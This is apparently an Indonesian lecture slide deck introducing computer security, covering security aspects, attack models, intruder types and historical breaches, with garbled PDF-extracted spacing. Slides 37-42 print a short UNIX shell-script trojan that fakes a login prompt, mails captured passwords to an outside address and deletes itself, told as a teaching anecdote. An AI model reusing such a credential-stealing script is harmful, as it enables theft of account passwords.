Keamanan Komputer 1

(1)

Pe nda hulua n

(2)

Ke am anan kom pute r

 Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama

keamanan infor masi yang diterapkan pada komputer. Sasaran keamanan komputer antara lain adalah sebagai perlindungan infor masi terhadapencur ian atau kor upsi, atau pemeliharaan keter sediaan, seper ti dijabarkan dalam kebijakan keamanan

 Keamanan komputer memberikan per syaratan terhadap komputer yang berbeda dari

kebanyakan persyaratan sistem karena ser ing kali berbentuk pembatasan terhadap apa

yang tidak boleh dilakukan komputer. Ini membuat keamanan komputer p menjadi

lebih menantang karena sudah cukup sulit untuk membuat program komputer

(3)

Ke am anan kom pute r

 Pendekatan yang umum dilakukan untuk meningkatkan keamanan komputer antara lain

adalah dengan membatasi akses fisik terhadap komputer, menerapkan mekanisme pada

(4)

M e ngapa Ke am anan Kom pute r dibutuhkan ? ? ?

Keamanan komputer di perlukan untuk menjamin sumber

daya agar tidak digunakan atau dimodifikasi oleh orang yang tidak berhak.

(5)

M e ngapa Ke am anan Kom pute r dibutuhkan ? ? ?

“Informati on- based Soci ety” : menyebabkan nilai infor masi

menjadi sangat penting dan menuntut kemampuan untuk mengakses dan menyediakan infor masi secara cepat dan akurat menjadi sangat esensial bagi sebuah organisasi

(6)

3 Ke lom pok Ke am anan S is te m

Keamanan Ekter nal / external securi ty

(7)

Ke am anan Eks te rnal

Keamanan yang berkaitan dengan fasilitas-fasilitas

komputer dar i penyusup dan bencana alam seper ti

(8)

Ke am anan Inte rface Pe m akai

Keamanan yang berkaitan dengan identifikasi pemakai

sebelum pemakai diijinkan mengakses program dan data

yang disimpan, contohnya penggunaan password sehingga

(9)

Ke am anan Inte rnal

Keamanan yang berkaitan dengan keamanan beragam

kendali yang dibangun pada perangkat keras (hardware) dan

(10)

As pe k Ke am anan Kom pute r

Me nurut Garfinke l [Sim s o n Garfinke l, “PGP: Pre tty Go o d Privacy,” O’ Re illy & As s o c i-ate s , Inc ., 1 9 9 5 . ]



Privacy / Confidentiality

 Defenisi : menjaga infor masi dari orang yang tidak berhak mengakses.

 Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator.

 Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk keperluan ter tentu dan hanya diperbolehkan untuk keperluan ter tentu tersebut.

 Contoh : data-data yang sifatnya pribadi (seper ti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang per nah

diderita, nomor kar tu kredit, dan sebagainya) har us dapat diproteksi dalam penggunaan dan penyebarannya.

 Bentuk Serangan : usaha penyadapan (dengan program sni ffer).

(11)



I ntegrity

Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.

Contoh : e-mail di intercept di tengah jalan, diubah isinya,

kemudian diteruskan ke alamat yang dituju.

Bentuk serangan : Adanya virus, troj an horse, atau pemakai lain

yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.

(12)



Authentication

Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi

adalah betul-betul orang yang dimaksud.

Dukungan :

AdanyaTools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking(untuk menjaga“i ntel l ectual property”, yaitu dengan menandai dokumen atau hasil karya

dengan “tanda tangan” pembuat ) dan digital signature.

Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya.

(13)



Availability

Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.

Contoh hambatan :

“deni al of servi ce attack” (DoSattack), dimana ser ver dikirimi

permintaan (biasanyapalsu) yang ber tubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash.

mai l bomb, dimana seorang pemakai dikirimi e-mail ber tubi-tubi

(katakan ribuan e-mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-mailnya atau kesulitan

mengakses e-mailnya.

(14)



Access Control

Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah

authentication dan juga privacy

Metode : menggunakan kombinasi userid/ password atau dengan

menggunakan mekanisme lain.



Non-repudiation

Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Dukungan bagi electronic commerce

(15)

 tanda tangan (signature(en)), mengesahkan suatu infor masi menjadi satu kesatuan di bawah suatu otor itas;

 otor isasi (author ization(en)), pember ian hak/ kewenangan kepada entitas lain di dalam sistem;

 validasi (validation(en)), pengecekan keabsahan suatu otor isasi;

 kontrol akses(access control(en)), pembatasan akses terhadap entitas di dalam sistem;

 ser tifikasi (cer tification(en)), pengesahan/ pember ian kuasa suatu infor masi kepada entitas yang ter percaya;

 pencatatan waktu (timestamping(en)), mencatat waktu pembuatan atau keberadaan suatu infor masi di dalam sistem;

 per saksian (witnessing(en)), memver ifikasi pembuatan dan keberadaan suatu infor masi di dalam sistem bukan oleh pembuatnya

(16)

 tanda ter ima(receipt(en)), pember itahuan bahwa infor masi telah diter ima;

 konfir masi (confir mation(en)), pember itahuan bahwa suatu layanan infor masi telah ter sedia;

 kepemilikan (owner ship(en)), menyediakan suatu entitas dengan sah untuk menggunakan atau mengir imkan kepada pihak lain;

 anonimitas(anonimity), menyamarkan identitas dar i entitas terkait dalam suatu proses transaksi;

 nir penyangkalan (non-repudiation(en)), mencegah penyangkalan dar i suatu entitas atas kesepakatan atau perbuatan yang sudah dibuat;

 penar ikan (revocation(en)), penar ikan kembali suatu ser tifikat atau otor itas.

(17)

Ke butuhan akan s e buah ke am anan

 Kerahasiaan (secrecy) adalah

keterjaminan sistem hanya dapat

diakses oleh pihak yang berhak.

 Integr itas (integrity) adalah sistem hanya dapat dimodifikasi oleh pihak yang berhak.

(18)

S e curity Attack M ode ls

 I nterruption: Perangkat sistem menjadi r usak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (avai l abi l i ty)

dari sistem. Contoh serangan adalah “denial of service attack”.

(19)

 I nterception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).  Ancaman terhadap aspek kerahasiaan,

(20)

 Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang mer ugikan pemilik web site.

 Ancaman terhadap aspek integritas, di mana sistem selain dapat diakses oleh orang yang tidak berhak tetapi juga dapat mer usak sumber daya (memodifikasi). Contohnya mengubah nilai file data, mengubah program sehingga ber tindak

(21)

 Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seper ti e-mail palsu ke dalam jaringan komputer.

 ancaman terhadap integritas, yaitu pihak yang tidak berhak dapat menyisipkan / memasukkan objek palsu ke dalam sistem. Contohnya memasukkan pesan palsu dan penambahan record ke file

(22)

Ke jahatan Kom pute r m e ningkat kare na :

Aplikasi bisnis berbasis TI dan jar ingan komputer

meningkat : online banking, e-commerce, Electronic data Interchange (EDI)

Desentralisasi ser ver.

Transisi dar i single vendor ke multi vendor.

Meningkatnya kemampuan pemakai (user).

Kesulitan penegak hukum dan belum adanya ketentuan

yang pasti.

Semakin kompleksnya system yang digunakan, semakin

besar nya source code program yang digunakan.

(23)

Klas ifikas i Ke jahatan Kom pute r

 Keamanan yang bersifat fisik (physical security): termasuk akses

orang ke gedung, peralatan, dan media yang digunakan. Contoh :

 Wiretapping, atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini

 D enial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diuta-makan adalah banyaknya jumlah pesan)

 Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh

(24)

Klas ifikas i Ke jahatan Kom pute r

Keamanan yang berhubungan dengan orang (per sonel)

Identifikasi user (user name dan password)

Profil resiko dar i orang yang mempunyai akses (pemakai dan pengelola).

Keamanan dar i data dan media ser ta teknik komunikasi

Keamanan dalam operasi : Adanya prosedur yang

digunakan untuk mengatur dan mengelola sistem

keamanan, dan juga ter-masuk prosedur setelah serangan

(25)

Karakte ris tik Pe nyus up



The Curious (Si I ngin Tahu)

- tipe penyusup ini pada dasar nya ter tar ik menemukan jenis sistem dan data yang anda miliki.

(26)

Karakte ris tik Pe nyus up



The H igh-Profile I ntruder (Si Profil Tinggi)

- tipe penyusup ini ber usaha menggunakan sistem anda untuk memperoleh popular itas dan ketenaran. Dia mungkin

menggunakan sistem profil tinggi anda untuk

mengiklankan kemampuannya.

(27)

Is tilah bagi pe nyus up



M undane

; tahu mengenai hacking tapi tidak

mengetahui metode dan prosesnya.



lamer (script kiddies)

; mencoba scr ipt2 yang per nah di buat oleh aktivis hacking, tapi tidak paham bagaimana cara membuatnya.



wannabe

; paham sedikit metode hacking, dan sudah mulai berhasil menerobos sehingga berfalsafah ; HACK IS MY RELIGION.

(28)

Is tilah bagi pe nyus up



hacker

; aktivitas hacking sebagai profesi.



wizard

; hacker yang membuat komunitas pembelajaran di antara mereka.

(29)

S e curity Bre ach Accide nt

1996 U.S. Federal Computer Inci dent Response Capabi l i ty

(FedCIRC) melaporkan bahwa lebih dar i 2500 “insiden” di system komputer atau jar ingan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan

1996, FBI N ati onal Computer Cri mes Squad, Washington

(30)

 1996 Inggr is, N CC Informati on Securi ty Breaches Survey

menunjukkan bahwa kejahatan komputer menaik 200% dar i tahun 1995 ke 1996. Ker ugian rata-rata US $30.000 / insiden

1997 Penelitian Del oi tte Touch Tohmatsu menunjukkan bahwa

(31)

1998 FBI melaporkan bahwa kasus per sidangan yang

berhubungan dengan kejahatan komputer meroket 950% dar i tahun 1996 ke tahun 1997, dengan penangkapan dar i 4 ke 42, dan terbukti (convi cted) di pengadilan naik 88%

dar i 16 ke 30 kasus

(32)

Contoh Akibat Je bolnya S is te m Ke am anan :

1988, Keamanan sistem mail sendmai l dieksploitasi oleh

Rober t Tapan Mor r is sehingga melumpuhkan sistem

Inter net. Kegiatan ini dapat diklasifikasikan sebagai “deni al of servi ce attack”. Diperkirakan biaya yang digunakan untuk

memperbaiki dan hal-hal lain yang hilang adalah sekitar

(33)

10 Maret 1997, Seorang hacker dar i Massachusetts berhasil mematikan sistem telekomunikasi di sebuah air por t local (Worcester, Massachusetts) sehingga mematikan

komunikasi di control tower dan menghalau pesawat yang hendak mendarat. Dia juga mengacaukan sistem telepon di Rutland, Massachusetts.

(34)

1990, Kevin Poulsen mengambil alih system komputer

telekomunikasi di Los Angeles untuk memenangkan kuis di sebuah radio local

1995, Kevin Mitnick, mencur i 20.000 nomor kar tu kredit,

menyalin system operasi DEC secara illegal dan

mengambil alih hubungan telpon di New York dan Califor nia

1995, Vladimir Levin membobol bank-bank di kawasan

(35)

2000, Fabian Clone menjebol situs aetna.co.id dan Jakar ta

mail dan membuat directory atas namanya ber isi

per ingatan terhadap administrator situs ter sebut

2000, Beberapa web site Indonesia sudah dijebol dan daftar nya (beser ta contoh halaman yang sudah dijebol) dapat dilihat di koleksi http:/ / www.2600.com

(36)

M e m aham i Hacke r Be ke rja

Secara umum melalui tahapan-tahapan sebagai ber ikut :

Tahap mencar i tahu system komputer sasaran.

Tahap penyusupan

Tahap penjelajahan

(37)

Contoh kas us Trojan Hous e , m e m anfaatkan

SHELL s cript UNIX

 Seorang gadi s canti k dan geni t peser ta kul i ah UN IX di sebuah perguruan ti nggi memi l iki potensi memanci ng pengelol a si stem komputer (admi ni strator pemegang account root . . . hmmm) yang l engah. Ia mel aporkan bahwa komputer tempat i a mel akukan tugas- tugas UN IX yang

di berikan ti dak dapat di pergunakan. Sang pengel ol a si stem komputer tentu saj a dengan gagah

perkasa i ngi n menunj ukkan kekuasaan sebagai admi ni strator UN IX

 " Wel l, i ni soal keci l. Mungki n password kamu ke blokir, bi ar saya perbai ki dari tempat kamu" , uj ar admi ni strator UN IX sombong sambi l duduk di sebel ah gadi s canti k dan geni t peser ta kul i ah

tersebut

 Keesokan hari nya, terj adi l ah kekacauan di si stem UN IX karena di duga terj adi penyusupan ol eh hacker termasuk j uga hompepage perguruan ti nggi tersebut di -obok- obok, makl um pengel ol anya

masi h sama. Sel anj utnya pi hak perguruan ti nggi mengel uarkan press rel ease bahwa homepage

(38)

SHELL s cript UNIX  Nah sebenarnyaapasih yang terjadi ?

 Sederhana, gadiscantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:

 # !/ bin/ sh

 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

 # Nama program : my_login

 # Deskripsi :Program kuda trojan sederhana

 # versi 1.0 Nopember 1999

 let COUNTER= $COIUNTER+ 1

 echo " login: \ c"

 read LOGIN

 stty echo

 echo " password: \ c"

 read PASSW ORD

 echo " User $LOGIN : $PASSW ORD" | mail gadis@company.com

 stty echo

 echo

 echo " Login Incorrect"

 done

 rm $0

(39)

 Apabila program ini dijalankan maka akan ditampilkan layar login seper ti layaknya awal penggunaan komputer pdaa sistem UNIX:

 Login:

 Password:

 Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak

(40)

 Seper ti pada program login sesungguhnya, sistem komputer akan meminta

pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

 Login:root

 Password: * * * * * * * *

 Login Incorrect

 Tentu sajaAdministrator UNIX akan kaget bahwa passwordnya ter nyata

(seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan

(41)

 Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ter nyata seorang hacker !!

 Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

 r m $0

(42)

 yang ar tinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peser ta kuliahnya.

(43)

Daftar Pus taka

 http:/ / id.wikipedia.org/ wiki/ Keamanan_komputer

 www.cer t.org

(44)